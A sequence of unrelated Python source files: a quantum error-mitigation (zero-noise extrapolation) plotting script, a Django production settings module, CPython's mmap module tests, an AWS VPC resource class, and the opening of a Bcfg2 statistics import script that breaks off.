# Step 2. Use the ZNE method to improve the accuracy of expectation value.
# -----------------------------------------------------------------------
EsRescaled = [] # EsRescaled size: [numSeq, order + 1]
EsExtrapolated = [] # EsExtrapolated size: [numSeq, order]
EsIdeal = [] # EsIdeal size: [numSeq,]
Infidelities = [] # Infidelities size: [numSeq, order + 1]
for length in range(1, numSeq + 1):
print('==' * 20)
print("Clifford circuit length:", length)
# For each sequence, append the equivalent-inverse gate of all the preceding quantum gates
# For each sequence, its length becomes: [1, 2, ..., numSeq] + 1
circuitPart = deepcopy(circuit[:length])
lastGate = computeInverseGate(circuitPart)
circuitPart.append(lastGate)
# Compute ideal expectations firstly for subsequent comparison in figure.
EsIdeal.append(computeIdealExpectationValue(state, circuitPart, A))
# Temporary extrapolated values of each order for each-length circuit.
mitigatedValues = []
# Use the Scheduler to compute the optimal Hamiltonian for this circuit.
ham = fromCircuitToHamiltonian(circuitPart)
# Rescale order: [c_0, c_1, ..., c_d]; extrapolation order: d
mitigatedValueHighest, infidelities, noisyValues = zneMitigation(state, circuitPart, A, ham=ham, order=order)
# Rescale order: [c_0, c_1], [c_0, c_1, c_2], ...., [c_0, ..., c_{d-1}]
# Loop: for d in [1, ..., d - 1]
for d in range(1, order):
mitigatedValue = extrapolate(infidelities[:(d + 1)], noisyValues[:(d + 1)], type='richardson', order=d)
mitigatedValues.append(mitigatedValue)
mitigatedValues.append(mitigatedValueHighest)
EsExtrapolated.append(mitigatedValues)
EsRescaled.append(noisyValues)
Infidelities.append(infidelities)
# X-axis represents length of quantum circuit, Y-axis represents expectation values.
plotZNESequences(EsRescaled, EsExtrapolated, EsIdeal, fileName='zne-single-qubit-clifford')
# To better illustrate extrapolation technique, in the following we compute,
# the error mitigated values using only the 2-order and 3-order rescaled expectation values.
InfidelitiesPartial = np.array(Infidelities)[:, 1:]
EsRescaledPartial = np.array(EsRescaled)[:, 1:]
orderPartial = order - 1
EsExtrapolatedPartial = [] # size: [numSeq, orderPartial]
for i in range(numSeq):
mitigatedValues = []
for d in range(1, orderPartial + 1):
mitigatedValue = extrapolate(InfidelitiesPartial[i][:(d + 1)], EsRescaledPartial[i][:(d + 1)],
type='richardson', order=d)
mitigatedValues.append(mitigatedValue)
EsExtrapolatedPartial.append(mitigatedValues)
plotZNESequences(EsRescaledPartial, EsExtrapolatedPartial, EsIdeal, fileName='zne-single-qubit-clifford-2')
|
py | 7dfac4c89144920f8dd9344796c036b861c2b55c | # -*- coding: utf-8 -*-
'''
Production Configurations
- Use djangosecure
- Use Amazon's S3 for storing static files and uploaded media
- Use mailgun to send emails
- Use Redis on Heroku
'''
from __future__ import absolute_import, unicode_literals
from boto.s3.connection import OrdinaryCallingFormat
from django.utils import six
from .common import * # noqa
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Raises ImproperlyConfigured exception if DJANGO_SECRET_KEY not in os.environ
SECRET_KEY = env("DJANGO_SECRET_KEY")
# This ensures that Django will be able to detect a secure connection
# properly on Heroku.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# django-secure
# ------------------------------------------------------------------------------
INSTALLED_APPS += ("djangosecure", )
SECURITY_MIDDLEWARE = (
'djangosecure.middleware.SecurityMiddleware',
)
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
MIDDLEWARE_CLASSES = SECURITY_MIDDLEWARE + MIDDLEWARE_CLASSES
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True)
SECURE_FRAME_DENY = env.bool("DJANGO_SECURE_FRAME_DENY", default=True)
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True)
SECURE_BROWSER_XSS_FILTER = True
SESSION_COOKIE_SECURE = False
SESSION_COOKIE_HTTPONLY = True
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# SITE CONFIGURATION
# ------------------------------------------------------------------------------
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list('DJANGO_ALLOWED_HOSTS', default=['iheartjupyterdocs.org'])
# END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
# STORAGE CONFIGURATION
# ------------------------------------------------------------------------------
# Uploaded Media Files
# ------------------------
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
AWS_ACCESS_KEY_ID = env('DJANGO_AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = env('DJANGO_AWS_SECRET_ACCESS_KEY')
AWS_STORAGE_BUCKET_NAME = env('DJANGO_AWS_STORAGE_BUCKET_NAME')
AWS_AUTO_CREATE_BUCKET = True
AWS_QUERYSTRING_AUTH = False
AWS_S3_CALLING_FORMAT = OrdinaryCallingFormat()
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIRY = 60 * 60 * 24 * 7
# TODO See: https://github.com/jschneier/django-storages/issues/47
# Revert the following and use str after the above-mentioned bug is fixed in
# either django-storage-redux or boto
AWS_HEADERS = {
'Cache-Control': six.b('max-age=%d, s-maxage=%d, must-revalidate' % (
AWS_EXPIRY, AWS_EXPIRY))
}
# URL that handles the media served from MEDIA_ROOT, used for managing
# stored files.
MEDIA_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
# Static Assets
# ------------------------
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
# EMAIL
# ------------------------------------------------------------------------------
DEFAULT_FROM_EMAIL = env('DJANGO_DEFAULT_FROM_EMAIL',
default='jupyter_doc <[email protected]>')
EMAIL_BACKEND = 'django_mailgun.MailgunBackend'
MAILGUN_ACCESS_KEY = env('DJANGO_MAILGUN_API_KEY')
MAILGUN_SERVER_NAME = env('DJANGO_MAILGUN_SERVER_NAME')
EMAIL_SUBJECT_PREFIX = env("DJANGO_EMAIL_SUBJECT_PREFIX", default='[jupyter_doc] ')
SERVER_EMAIL = env('DJANGO_SERVER_EMAIL', default=DEFAULT_FROM_EMAIL)
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See:
# https://docs.djangoproject.com/en/dev/ref/templates/api/#django.template.loaders.cached.Loader
TEMPLATES[0]['OPTIONS']['loaders'] = [
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ]),
]
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
DATABASES['default'] = env.db("DATABASE_URL")
# CACHING
# ------------------------------------------------------------------------------
# Heroku URL does not pass the DB number, so we parse it in
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "{0}/{1}".format(env('REDIS_URL', default="redis://127.0.0.1:6379"), 0),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"IGNORE_EXCEPTIONS": True, # mimics memcache behavior.
# http://niwinz.github.io/django-redis/latest/#_memcached_exceptions_behavior
}
}
}
# LOGGING CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s '
'%(process)d %(thread)d %(message)s'
},
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose',
},
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True
},
'django.security.DisallowedHost': {
'level': 'ERROR',
'handlers': ['console', 'mail_admins'],
'propagate': True
}
}
}
# Custom Admin URL, use {% url 'admin:index' %}
ADMIN_URL = env('DJANGO_ADMIN_URL')
# Your production stuff: Below this line define 3rd party library settings
|
py | 7dfac4e078e7899aede1fe81a04306a43341ef90 | from test.test_support import (TESTFN, run_unittest, import_module, unlink,
requires, _2G, _4G)
import unittest
import os, re, itertools, socket, sys
mmap = import_module('mmap')
PAGESIZE = mmap.PAGESIZE
class MmapTests(unittest.TestCase):
def setUp(self):
if os.path.exists(TESTFN):
os.unlink(TESTFN)
def tearDown(self):
try:
os.unlink(TESTFN)
except OSError:
pass
def test_basic(self):
# Test mmap module on Unix systems and Windows
# Create a file to be mmap'ed.
f = open(TESTFN, 'w+')
try:
# Write 2 pages worth of data to the file
f.write('\0'* PAGESIZE)
f.write('foo')
f.write('\0'* (PAGESIZE-3) )
f.flush()
m = mmap.mmap(f.fileno(), 2 * PAGESIZE)
f.close()
# Simple sanity checks
tp = str(type(m)) # SF bug 128713: segfaulted on Linux
self.assertEqual(m.find('foo'), PAGESIZE)
self.assertEqual(len(m), 2*PAGESIZE)
self.assertEqual(m[0], '\0')
self.assertEqual(m[0:3], '\0\0\0')
# Shouldn't crash on boundary (Issue #5292)
self.assertRaises(IndexError, m.__getitem__, len(m))
self.assertRaises(IndexError, m.__setitem__, len(m), '\0')
# Modify the file's content
m[0] = '3'
m[PAGESIZE +3: PAGESIZE +3+3] = 'bar'
# Check that the modification worked
self.assertEqual(m[0], '3')
self.assertEqual(m[0:3], '3\0\0')
self.assertEqual(m[PAGESIZE-1 : PAGESIZE + 7], '\0foobar\0')
m.flush()
# Test doing a regular expression match in an mmap'ed file
match = re.search('[A-Za-z]+', m)
if match is None:
self.fail('regex match on mmap failed!')
else:
start, end = match.span(0)
length = end - start
self.assertEqual(start, PAGESIZE)
self.assertEqual(end, PAGESIZE + 6)
# test seeking around (try to overflow the seek implementation)
m.seek(0,0)
self.assertEqual(m.tell(), 0)
m.seek(42,1)
self.assertEqual(m.tell(), 42)
m.seek(0,2)
self.assertEqual(m.tell(), len(m))
# Try to seek to negative position...
self.assertRaises(ValueError, m.seek, -1)
# Try to seek beyond end of mmap...
self.assertRaises(ValueError, m.seek, 1, 2)
# Try to seek to negative position...
self.assertRaises(ValueError, m.seek, -len(m)-1, 2)
# Try resizing map
try:
m.resize(512)
except SystemError:
# resize() not supported
# No messages are printed, since the output of this test suite
# would then be different across platforms.
pass
else:
# resize() is supported
self.assertEqual(len(m), 512)
# Check that we can no longer seek beyond the new size.
self.assertRaises(ValueError, m.seek, 513, 0)
# Check that the underlying file is truncated too
# (bug #728515)
f = open(TESTFN)
f.seek(0, 2)
self.assertEqual(f.tell(), 512)
f.close()
self.assertEqual(m.size(), 512)
m.close()
finally:
try:
f.close()
except OSError:
pass
def test_access_parameter(self):
# Test for "access" keyword parameter
mapsize = 10
with open(TESTFN, "wb") as f:
f.write("a"*mapsize)
f = open(TESTFN, "rb")
m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_READ)
self.assertEqual(m[:], 'a'*mapsize, "Readonly memory map data incorrect.")
# Ensuring that readonly mmap can't be slice assigned
try:
m[:] = 'b'*mapsize
except TypeError:
pass
else:
self.fail("Able to write to readonly memory map")
# Ensuring that readonly mmap can't be item assigned
try:
m[0] = 'b'
except TypeError:
pass
else:
self.fail("Able to write to readonly memory map")
# Ensuring that readonly mmap can't be write() to
try:
m.seek(0,0)
m.write('abc')
except TypeError:
pass
else:
self.fail("Able to write to readonly memory map")
# Ensuring that readonly mmap can't be write_byte() to
try:
m.seek(0,0)
m.write_byte('d')
except TypeError:
pass
else:
self.fail("Able to write to readonly memory map")
# Ensuring that readonly mmap can't be resized
try:
m.resize(2*mapsize)
except SystemError: # resize is not universally supported
pass
except TypeError:
pass
else:
self.fail("Able to resize readonly memory map")
f.close()
m.close()
del m, f
with open(TESTFN, "rb") as f:
self.assertEqual(f.read(), 'a'*mapsize,
"Readonly memory map data file was modified")
# Opening mmap with size too big
import sys
f = open(TESTFN, "r+b")
try:
m = mmap.mmap(f.fileno(), mapsize+1)
except ValueError:
# we do not expect a ValueError on Windows
# CAUTION: This also changes the size of the file on disk, and
# later tests assume that the length hasn't changed. We need to
# repair that.
if sys.platform.startswith('win'):
self.fail("Opening mmap with size+1 should work on Windows.")
else:
# we expect a ValueError on Unix, but not on Windows
if not sys.platform.startswith('win'):
self.fail("Opening mmap with size+1 should raise ValueError.")
m.close()
f.close()
if sys.platform.startswith('win'):
# Repair damage from the resizing test.
f = open(TESTFN, 'r+b')
f.truncate(mapsize)
f.close()
# Opening mmap with access=ACCESS_WRITE
f = open(TESTFN, "r+b")
m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_WRITE)
# Modifying write-through memory map
m[:] = 'c'*mapsize
self.assertEqual(m[:], 'c'*mapsize,
"Write-through memory map memory not updated properly.")
m.flush()
m.close()
f.close()
f = open(TESTFN, 'rb')
stuff = f.read()
f.close()
self.assertEqual(stuff, 'c'*mapsize,
"Write-through memory map data file not updated properly.")
# Opening mmap with access=ACCESS_COPY
f = open(TESTFN, "r+b")
m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_COPY)
# Modifying copy-on-write memory map
m[:] = 'd'*mapsize
self.assertEqual(m[:], 'd' * mapsize,
"Copy-on-write memory map data not written correctly.")
m.flush()
f.close()
with open(TESTFN, "rb") as f:
self.assertEqual(f.read(), 'c'*mapsize,
"Copy-on-write test data file should not be modified.")
# Ensuring copy-on-write maps cannot be resized
self.assertRaises(TypeError, m.resize, 2*mapsize)
m.close()
del m, f
# Ensuring invalid access parameter raises exception
f = open(TESTFN, "r+b")
self.assertRaises(ValueError, mmap.mmap, f.fileno(), mapsize, access=4)
f.close()
if os.name == "posix":
# Try incompatible flags, prot and access parameters.
f = open(TESTFN, "r+b")
self.assertRaises(ValueError, mmap.mmap, f.fileno(), mapsize,
flags=mmap.MAP_PRIVATE,
prot=mmap.PROT_READ, access=mmap.ACCESS_WRITE)
f.close()
# Try writing with PROT_EXEC and without PROT_WRITE
prot = mmap.PROT_READ | getattr(mmap, 'PROT_EXEC', 0)
with open(TESTFN, "r+b") as f:
m = mmap.mmap(f.fileno(), mapsize, prot=prot)
self.assertRaises(TypeError, m.write, b"abcdef")
self.assertRaises(TypeError, m.write_byte, 0)
m.close()
def test_bad_file_desc(self):
# Try opening a bad file descriptor...
self.assertRaises(mmap.error, mmap.mmap, -2, 4096)
def test_tougher_find(self):
# Do a tougher .find() test. SF bug 515943 pointed out that, in 2.2,
# searching for data with embedded \0 bytes didn't work.
f = open(TESTFN, 'w+')
data = 'aabaac\x00deef\x00\x00aa\x00'
n = len(data)
f.write(data)
f.flush()
m = mmap.mmap(f.fileno(), n)
f.close()
for start in range(n+1):
for finish in range(start, n+1):
slice = data[start : finish]
self.assertEqual(m.find(slice), data.find(slice))
self.assertEqual(m.find(slice + 'x'), -1)
m.close()
def test_find_end(self):
# test the new 'end' parameter works as expected
f = open(TESTFN, 'w+')
data = 'one two ones'
n = len(data)
f.write(data)
f.flush()
m = mmap.mmap(f.fileno(), n)
f.close()
self.assertEqual(m.find('one'), 0)
self.assertEqual(m.find('ones'), 8)
self.assertEqual(m.find('one', 0, -1), 0)
self.assertEqual(m.find('one', 1), 8)
self.assertEqual(m.find('one', 1, -1), 8)
self.assertEqual(m.find('one', 1, -2), -1)
m.close()
def test_rfind(self):
# test the new 'end' parameter works as expected
f = open(TESTFN, 'w+')
data = 'one two ones'
n = len(data)
f.write(data)
f.flush()
m = mmap.mmap(f.fileno(), n)
f.close()
self.assertEqual(m.rfind('one'), 8)
self.assertEqual(m.rfind('one '), 0)
self.assertEqual(m.rfind('one', 0, -1), 8)
self.assertEqual(m.rfind('one', 0, -2), 0)
self.assertEqual(m.rfind('one', 1, -1), 8)
self.assertEqual(m.rfind('one', 1, -2), -1)
m.close()
def test_double_close(self):
# make sure a double close doesn't crash on Solaris (Bug# 665913)
f = open(TESTFN, 'w+')
f.write(2**16 * 'a') # Arbitrary character
f.close()
f = open(TESTFN)
mf = mmap.mmap(f.fileno(), 2**16, access=mmap.ACCESS_READ)
mf.close()
mf.close()
f.close()
def test_entire_file(self):
# test mapping of entire file by passing 0 for map length
if hasattr(os, "stat"):
f = open(TESTFN, "w+")
f.write(2**16 * 'm') # Arbitrary character
f.close()
f = open(TESTFN, "rb+")
mf = mmap.mmap(f.fileno(), 0)
self.assertEqual(len(mf), 2**16, "Map size should equal file size.")
self.assertEqual(mf.read(2**16), 2**16 * "m")
mf.close()
f.close()
def test_length_0_offset(self):
# Issue #10916: test mapping of remainder of file by passing 0 for
# map length with an offset doesn't cause a segfault.
if not hasattr(os, "stat"):
self.skipTest("needs os.stat")
# NOTE: allocation granularity is currently 65536 under Win64,
# and therefore the minimum offset alignment.
with open(TESTFN, "wb") as f:
f.write((65536 * 2) * b'm') # Arbitrary character
with open(TESTFN, "rb") as f:
mf = mmap.mmap(f.fileno(), 0, offset=65536, access=mmap.ACCESS_READ)
try:
self.assertRaises(IndexError, mf.__getitem__, 80000)
finally:
mf.close()
def test_length_0_large_offset(self):
# Issue #10959: test mapping of a file by passing 0 for
# map length with a large offset doesn't cause a segfault.
if not hasattr(os, "stat"):
self.skipTest("needs os.stat")
with open(TESTFN, "wb") as f:
f.write(115699 * b'm') # Arbitrary character
with open(TESTFN, "w+b") as f:
self.assertRaises(ValueError, mmap.mmap, f.fileno(), 0,
offset=2147418112)
def test_move(self):
# make move works everywhere (64-bit format problem earlier)
f = open(TESTFN, 'w+')
f.write("ABCDEabcde") # Arbitrary character
f.flush()
mf = mmap.mmap(f.fileno(), 10)
mf.move(5, 0, 5)
self.assertEqual(mf[:], "ABCDEABCDE", "Map move should have duplicated front 5")
mf.close()
f.close()
# more excessive test
data = "0123456789"
for dest in range(len(data)):
for src in range(len(data)):
for count in range(len(data) - max(dest, src)):
expected = data[:dest] + data[src:src+count] + data[dest+count:]
m = mmap.mmap(-1, len(data))
m[:] = data
m.move(dest, src, count)
self.assertEqual(m[:], expected)
m.close()
# segfault test (Issue 5387)
m = mmap.mmap(-1, 100)
offsets = [-100, -1, 0, 1, 100]
for source, dest, size in itertools.product(offsets, offsets, offsets):
try:
m.move(source, dest, size)
except ValueError:
pass
offsets = [(-1, -1, -1), (-1, -1, 0), (-1, 0, -1), (0, -1, -1),
(-1, 0, 0), (0, -1, 0), (0, 0, -1)]
for source, dest, size in offsets:
self.assertRaises(ValueError, m.move, source, dest, size)
m.close()
m = mmap.mmap(-1, 1) # single byte
self.assertRaises(ValueError, m.move, 0, 0, 2)
self.assertRaises(ValueError, m.move, 1, 0, 1)
self.assertRaises(ValueError, m.move, 0, 1, 1)
m.move(0, 0, 1)
m.move(0, 0, 0)
def test_anonymous(self):
# anonymous mmap.mmap(-1, PAGE)
m = mmap.mmap(-1, PAGESIZE)
for x in xrange(PAGESIZE):
self.assertEqual(m[x], '\0', "anonymously mmap'ed contents should be zero")
for x in xrange(PAGESIZE):
m[x] = ch = chr(x & 255)
self.assertEqual(m[x], ch)
def test_extended_getslice(self):
# Test extended slicing by comparing with list slicing.
s = "".join(chr(c) for c in reversed(range(256)))
m = mmap.mmap(-1, len(s))
m[:] = s
self.assertEqual(m[:], s)
indices = (0, None, 1, 3, 19, 300, -1, -2, -31, -300)
for start in indices:
for stop in indices:
# Skip step 0 (invalid)
for step in indices[1:]:
self.assertEqual(m[start:stop:step],
s[start:stop:step])
def test_extended_set_del_slice(self):
# Test extended slicing by comparing with list slicing.
s = "".join(chr(c) for c in reversed(range(256)))
m = mmap.mmap(-1, len(s))
indices = (0, None, 1, 3, 19, 300, -1, -2, -31, -300)
for start in indices:
for stop in indices:
# Skip invalid step 0
for step in indices[1:]:
m[:] = s
self.assertEqual(m[:], s)
L = list(s)
# Make sure we have a slice of exactly the right length,
# but with different data.
data = L[start:stop:step]
data = "".join(reversed(data))
L[start:stop:step] = data
m[start:stop:step] = data
self.assertEqual(m[:], "".join(L))
def make_mmap_file (self, f, halfsize):
# Write 2 pages worth of data to the file
f.write ('\0' * halfsize)
f.write ('foo')
f.write ('\0' * (halfsize - 3))
f.flush ()
return mmap.mmap (f.fileno(), 0)
def test_offset (self):
f = open (TESTFN, 'w+b')
try: # unlink TESTFN no matter what
halfsize = mmap.ALLOCATIONGRANULARITY
m = self.make_mmap_file (f, halfsize)
m.close ()
f.close ()
mapsize = halfsize * 2
# Try invalid offset
f = open(TESTFN, "r+b")
for offset in [-2, -1, None]:
try:
m = mmap.mmap(f.fileno(), mapsize, offset=offset)
self.assertEqual(0, 1)
except (ValueError, TypeError, OverflowError):
pass
else:
self.assertEqual(0, 0)
f.close()
# Try valid offset, hopefully 8192 works on all OSes
f = open(TESTFN, "r+b")
m = mmap.mmap(f.fileno(), mapsize - halfsize, offset=halfsize)
self.assertEqual(m[0:3], 'foo')
f.close()
# Try resizing map
try:
m.resize(512)
except SystemError:
pass
else:
# resize() is supported
self.assertEqual(len(m), 512)
# Check that we can no longer seek beyond the new size.
self.assertRaises(ValueError, m.seek, 513, 0)
# Check that the content is not changed
self.assertEqual(m[0:3], 'foo')
# Check that the underlying file is truncated too
f = open(TESTFN)
f.seek(0, 2)
self.assertEqual(f.tell(), halfsize + 512)
f.close()
self.assertEqual(m.size(), halfsize + 512)
m.close()
finally:
f.close()
try:
os.unlink(TESTFN)
except OSError:
pass
def test_subclass(self):
class anon_mmap(mmap.mmap):
def __new__(klass, *args, **kwargs):
return mmap.mmap.__new__(klass, -1, *args, **kwargs)
anon_mmap(PAGESIZE)
def test_prot_readonly(self):
if not hasattr(mmap, 'PROT_READ'):
return
mapsize = 10
with open(TESTFN, "wb") as f:
f.write("a"*mapsize)
f = open(TESTFN, "rb")
m = mmap.mmap(f.fileno(), mapsize, prot=mmap.PROT_READ)
self.assertRaises(TypeError, m.write, "foo")
f.close()
def test_error(self):
self.assertTrue(issubclass(mmap.error, EnvironmentError))
self.assertIn("mmap.error", str(mmap.error))
def test_io_methods(self):
data = "0123456789"
with open(TESTFN, "wb") as f:
f.write("x"*len(data))
f = open(TESTFN, "r+b")
m = mmap.mmap(f.fileno(), len(data))
f.close()
# Test write_byte()
for i in xrange(len(data)):
self.assertEqual(m.tell(), i)
m.write_byte(data[i])
self.assertEqual(m.tell(), i+1)
self.assertRaises(ValueError, m.write_byte, "x")
self.assertEqual(m[:], data)
# Test read_byte()
m.seek(0)
for i in xrange(len(data)):
self.assertEqual(m.tell(), i)
self.assertEqual(m.read_byte(), data[i])
self.assertEqual(m.tell(), i+1)
self.assertRaises(ValueError, m.read_byte)
# Test read()
m.seek(3)
self.assertEqual(m.read(3), "345")
self.assertEqual(m.tell(), 6)
# Test write()
m.seek(3)
m.write("bar")
self.assertEqual(m.tell(), 6)
self.assertEqual(m[:], "012bar6789")
m.seek(8)
self.assertRaises(ValueError, m.write, "bar")
m.close()
if os.name == 'nt':
def test_tagname(self):
data1 = "0123456789"
data2 = "abcdefghij"
assert len(data1) == len(data2)
# Test same tag
m1 = mmap.mmap(-1, len(data1), tagname="foo")
m1[:] = data1
m2 = mmap.mmap(-1, len(data2), tagname="foo")
m2[:] = data2
self.assertEqual(m1[:], data2)
self.assertEqual(m2[:], data2)
m2.close()
m1.close()
# Test different tag
m1 = mmap.mmap(-1, len(data1), tagname="foo")
m1[:] = data1
m2 = mmap.mmap(-1, len(data2), tagname="boo")
m2[:] = data2
self.assertEqual(m1[:], data1)
self.assertEqual(m2[:], data2)
m2.close()
m1.close()
def test_crasher_on_windows(self):
# Should not crash (Issue 1733986)
m = mmap.mmap(-1, 1000, tagname="foo")
try:
mmap.mmap(-1, 5000, tagname="foo")[:] # same tagname, but larger size
except:
pass
m.close()
# Should not crash (Issue 5385)
with open(TESTFN, "wb") as f:
f.write("x"*10)
f = open(TESTFN, "r+b")
m = mmap.mmap(f.fileno(), 0)
f.close()
try:
m.resize(0) # will raise WindowsError
except:
pass
try:
m[:]
except:
pass
m.close()
def test_invalid_descriptor(self):
# socket file descriptors are valid, but out of range
# for _get_osfhandle, causing a crash when validating the
# parameters to _get_osfhandle.
s = socket.socket()
try:
with self.assertRaises(mmap.error):
m = mmap.mmap(s.fileno(), 10)
finally:
s.close()
class LargeMmapTests(unittest.TestCase):
def setUp(self):
unlink(TESTFN)
def tearDown(self):
unlink(TESTFN)
def _make_test_file(self, num_zeroes, tail):
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
requires('largefile',
'test requires %s bytes and a long time to run' % str(0x180000000))
f = open(TESTFN, 'w+b')
try:
f.seek(num_zeroes)
f.write(tail)
f.flush()
except (IOError, OverflowError):
f.close()
raise unittest.SkipTest("filesystem does not have largefile support")
return f
def test_large_offset(self):
with self._make_test_file(0x14FFFFFFF, b" ") as f:
m = mmap.mmap(f.fileno(), 0, offset=0x140000000, access=mmap.ACCESS_READ)
try:
self.assertEqual(m[0xFFFFFFF], b" ")
finally:
m.close()
def test_large_filesize(self):
with self._make_test_file(0x17FFFFFFF, b" ") as f:
m = mmap.mmap(f.fileno(), 0x10000, access=mmap.ACCESS_READ)
try:
self.assertEqual(m.size(), 0x180000000)
finally:
m.close()
# Issue 11277: mmap() with large (~4GB) sparse files crashes on OS X.
def _test_around_boundary(self, boundary):
tail = b' DEARdear '
start = boundary - len(tail) // 2
end = start + len(tail)
with self._make_test_file(start, tail) as f:
m = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
try:
self.assertEqual(m[start:end], tail)
finally:
m.close()
@unittest.skipUnless(sys.maxsize > _4G, "test cannot run on 32-bit systems")
def test_around_2GB(self):
self._test_around_boundary(_2G)
@unittest.skipUnless(sys.maxsize > _4G, "test cannot run on 32-bit systems")
def test_around_4GB(self):
self._test_around_boundary(_4G)
def test_main():
run_unittest(MmapTests, LargeMmapTests)
if __name__ == '__main__':
test_main()
|
py | 7dfac617a8cde132783c2c97e968a5a7794d556d | # Copyright 2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pcf.core.aws_resource import AWSResource
from pcf.core import State
from pcf.util import pcf_util
class VPCInstance(AWSResource):
"""
This is the implementation of Amazon's VPC resource.
"""
flavor = "vpc_instance"
state_lookup = {
"available": State.running,
"pending": State.pending,
"missing": State.terminated
}
equivalent_states = {
State.running: 1,
State.stopped: 0,
State.terminated: 0
}
START_PARAMS = {
"CidrBlock",
"AmazonProvidedIpv6CidrBlock",
"InstanceTenancy"
}
UNIQUE_KEYS = ["aws_resource.custom_config.vpc_name"]
def __init__(self, particle_definition):
super(VPCInstance, self).__init__(particle_definition, "ec2")
self._set_unique_keys()
self.vpc_name = self.custom_config.get("vpc_name")
self._vpc_client = None
@property
def vpc_client(self):
"""
The VPC client. Calls _get_vpc_client to create a new client if needed
Returns:
vpc_client
"""
if not self._vpc_client:
self._vpc_client = self._get_vpc_client()
return self._vpc_client
def _get_vpc_client(self):
"""
Creates a new vpc_client
Returns:
vpc_client
"""
return self.resource.Vpc(self.vpc_id)
def _set_unique_keys(self):
"""
Logic that sets keys from state definition that are used to uniquely identify the VPC
"""
self.unique_keys = VPCInstance.UNIQUE_KEYS
def get_status(self):
"""
Calls boto3 describe_vpc using describe_vpcs().
Returns:
status or {"status":"missing"}
"""
vpc = self.client.describe_vpcs(Filters=[{"Name":"tag:PCFName","Values":[self.vpc_name]}])
if len(vpc["Vpcs"]) == 1:
return vpc["Vpcs"][0]
def _terminate(self):
"""
Calls boto3 delete_vpc()
Returns:
boto3 delete_vpc() response
"""
resp = self.client.delete_vpc(VpcId=self.vpc_id)
return resp
def _start(self):
"""
Creates vpc and adds tag for PCFName
Returns:
boto3 create_vpc() response
"""
resp = self.client.create_vpc(**pcf_util.param_filter(self.desired_state_definition,VPCInstance.START_PARAMS))
self.vpc_id = resp['Vpc'].get("VpcId")
self.current_state_definition = resp
tags = self.custom_config.get("Tags",[])
tags.append({"Key":"PCFName","Value":self.vpc_name})
self.vpc_client.create_tags(Tags=tags)
return resp
def _stop(self):
"""
Calls _terminate()
"""
return self._terminate()
def _update(self):
"""
No updates available
"""
raise NotImplemented
def sync_state(self):
"""
Calls get_status() and updates the current_state_definition and the state.
"""
full_status = self.get_status()
if full_status is None:
self.state = State.terminated
else:
self.state = VPCInstance.state_lookup.get(full_status["State"])
self.current_state_definition = full_status
self.vpc_id = full_status.get("VpcId")
def is_state_equivalent(self, state1, state2):
"""
Args:
state1 (State):
state2 (State):
Returns:
bool
"""
return VPCInstance.equivalent_states.get(state1) == VPCInstance.equivalent_states.get(state2)
def is_state_definition_equivalent(self):
"""
Since there is no update available for vpc this always returns True
Returns:
bool
"""
return True
|
py | 7dfac6fae33b5c720428197ad3137dcbba5d22f4 | #! /usr/bin/env python
"""
Imports statistics.xml and clients.xml files in to database backend for
new statistics engine
"""
__revision__ = '$Revision$'
import binascii
import os
import sys
try:
import Bcfg2.Server.Reports.settings
except Exception:
e = sys.exc_info()[1]
sys.stderr.write("Failed to load configuration settings. %s\n" % e)
sys.exit(1)
project_directory = os.path.dirname(Bcfg2.Server.Reports.settings.__file__)
project_name = os.path.basename(project_directory)
